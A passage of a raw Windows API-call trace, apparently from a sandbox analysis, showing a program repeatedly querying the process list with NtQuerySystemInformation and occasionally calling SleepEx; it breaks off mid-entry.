NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.337] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0075.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0075.974] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0078.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdcf8) returned 0x0 [0084.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xee58) returned 0x0 [0084.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf128) returned 0x0 [0084.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf128) returned 0x0 [0084.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf128) returned 0x0 [0084.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf128) returned 0x0 [0084.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf128) returned 0x0 [0084.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, 